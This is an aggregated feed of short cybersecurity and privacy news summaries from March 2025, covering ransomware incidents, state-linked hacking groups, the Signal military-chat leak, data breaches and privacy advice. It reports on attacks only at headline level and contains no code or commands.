Data stolen included checklist for medics on how to get into vulnerable people's homes The UK's data protection watchdog is dishing out a 3.07 million ($3.95 million) fine to Advanced Computer Software Group, whose subsidiary's security failings led to a ransomware attack affecting NHS care.
Published: 2025-03-27T09:30:06
Vivaldi and Proton have teamed up to make it easier for Vivaldi browser users to privately explore the web without downloading a virtual private network (VPN). Starting today, the free version of Proton VPN is now integrated directly into Vivaldi's browser, and can be accessed by logging into a Vivaldi account. The feature is currently […] 
Vivaldi and Proton have teamed up to make it easier for Vivaldi browser users to privately explore the web without downloading a virtual private network (VPN). Starting today, the free version of Proton VPN is now integrated directly into Vivaldi’s...
Published: 2025-03-27T06:44:51
The Chinese threat actor known as FamousSparrow has been linked to a cyber attack targeting a trade group in the United States and a research institute in Mexico to deliver its flagship backdoor SparrowDoor and ShadowPad. The activity, observed in July 2024, marks the first time the hacking crew has deployed ShadowPad, a malware widely shared by Chinese state-sponsored actors. "FamousSparrow
Published: 2025-03-26T22:29:00
So F-18 launch times, weapons, drone support aren't classified now ... who knew? Updated The Atlantic's editor-in-chief who was inadvertently added to a Signal group in which the US Secretary of Defense, Vice President, and others discussed secret military plans has now publicly released the messages.
Published: 2025-03-26T21:16:32
A WIRED review shows national security adviser Mike Waltz, White House chief of staff Susie Wiles, and other top officials left sensitive information exposed via Venmo until WIRED asked about it.
Published: 2025-03-26T20:44:21
MORSE to pay -- .. .-.. .-.. .. --- -. ... for failing to meet cyber-grade A US defense contractor will cough up $4.6 million to settle complaints it failed to meet cybersecurity requirements on military contracts and knowingly submitted false claims for payment.
Published: 2025-03-26T20:07:11
The threat actor known as EncryptHub exploited a recently-patched security vulnerability in Microsoft Windows as a zero-day to deliver a wide range of malware families, including backdoors and information stealers such as Rhadamanthys and StealC. "In this attack, the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload,
Published: 2025-03-26T19:23:00
The Russian-speaking hacking group called RedCurl has been linked to a ransomware campaign for the first time, marking a departure in the threat actor's tradecraft. The activity, observed by Romanian cybersecurity company Bitdefender, involves the deployment of a never-before-seen ransomware strain dubbed QWCrypt. RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating
Published: 2025-03-26T19:13:00
The Trump cabinet’s shocking leak of its plans to bomb Yemen raises myriad confidentiality and legal issues. The security of the encrypted messaging app Signal is not one of them.
Published: 2025-03-26T18:54:49
Victims' details at risk after criminals download 9,000 files from court database Australian police are currently investigating the theft of "sensitive" data from a New South Wales court system after they confirmed approximately 9,000 files were stolen.
Published: 2025-03-26T17:29:05
Bad news about the Linux system monitor may be on the way Updated Veteran sysadmin and tech blogger Rachel Kroll posted a cryptic warning yesterday about a popular Linux system monitoring tool. Maybe it's better to be safe than sorry.
Published: 2025-03-26T15:31:09
Who knew social media stars had a role to play in building national cyber resilience? The world's biggest brands have benefited from influencer marketing for years now the UK's National Cyber Security Centre (NCSC) has hopped on the bandwagon to preach two-factor authentication (2FA) to the masses.
Published: 2025-03-26T11:00:13
On March 24th, The Atlantic's editor-in-chief Jeffrey Goldberg published a damning story about being added to the Houthi PC Small Group on Signal by Trump's national security adviser Mike Waltz. In it, he described inadvertently becoming privy to h
Published: 2025-03-26T10:58:12
Customers come forward claiming info was swiped from prod Oracle Cloud's denial of a digital break-in is now in clear dispute. A infosec researcher working on validating claims that the cloud provider's login servers were compromised earlier this year says some customers have confirmed data allegedly stolen and leaked from the database giant is genuine.
Published: 2025-03-25T17:35:42
16,000 stolen records pertain to former and active mail subscribers Infosec veteran Troy Hunt of HaveIBeenPwned fame is notifying thousands of people after phishers scooped up his Mailchimp mailing list.
Published: 2025-03-25T12:28:08
Just an FYI, like Generative AI assistants packaged up as browser extensions harvest personal data with minimal safeguards, researchers warn.
Published: 2025-03-25T08:31:12
There's only one rule don't attack Russia, duh Check Point has spotted a fresh ransomware-as-a-service crew in town: VanHelsing, touting a cross-platform locker targeting Microsoft Windows, Linux, and VMware ESXi systems, among others. But so far, only Windows machines have fallen victim, we're told.
Published: 2025-03-25T07:32:07
DNA-testing company 23andMe has filed for bankruptcy, which means the future of the company’s vast trove of customer data is unknown. Here’s what that means for your genetic data.
Published: 2025-03-24T20:51:59
Crossing into the United States has become increasingly dangerous for digital privacy. Here are a few steps you can take to minimize the risk of Customs and Border Protection accessing your data.
Published: 2025-03-24T18:10:05
Getting added to the wrong group chat is a common problem, but what if that group chat is describing an upcoming military strike? That's what happened to The Atlantic editor-in-chief Jeffrey Goldberg, who was added to a Signal group chat formed by hi
Published: 2025-03-24T17:45:00
Connor Moucka, accused of stealing large amounts of customer data from companies that used Snowflake's cloud storage services, has agreed to be extradited to the US to face charges, Cyberscoop reports. Around 165 companies were affected by the Snowflake breaches, including AT&T and Ticketmaster. Alexander Connor Moucka, who was arrested in Canada on October 30th […] 
Connor Moucka, accused of stealing large amounts of customer data from companies that used Snowflake’s cloud storage services, has agreed to be extradited to the US to face charges, Cyberscoop reports. Around 165 companies were affected by the Snow...
Published: 2025-03-24T17:39:05
The ad hoc addition to the otherwise tightly controlled White House information environment could create blind spots and security exposures while setting potentially dangerous precedent.
Published: 2025-03-24T17:24:31
Companies in the EU are starting to look for ways to ditch Amazon, Google, and Microsoft cloud services amid fears of rising security risks from the US. But cutting ties won’t be easy.
Published: 2025-03-24T06:00:00
The US Air Force has announced that it will go ahead with the production of the F-47 Next Generation Air Dominance (NGAD) fighter. Expected to enter service by the end of the decade, it will replace the F-22 Raptor as America's air supremacy fighter....
Published: 2025-03-24T00:21:08
Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets b... 
Published: 2025-03-21T19:12:04
Amid growing concerns over Big Tech firms aligning with Trump administration policies, people are starting to move their digital lives to services based overseas. Here's what you need to know.
Published: 2025-03-21T10:30:00
Google is taking down 10,000 fake business listings from Google Maps and suing a network of scammers who set them up, CBS News reports. The company's lawsuit alleges that a man connected to a broader scam network created fake business profiles on Google Maps and sold them for profit. Google was tipped off by a […] 
Google is taking down 10,000 fake business listings from Google Maps and suing a network of scammers who set them up, CBS News reports. The company’s lawsuit alleges that a man connected to a broader scam network created fake business profiles on G...
Published: 2025-03-20T17:32:57
Chinese ecommerce giants like Temu and AliExpress sell drone accessories like those used by soldiers in the Russia-Ukraine conflict.
Published: 2025-03-20T09:00:00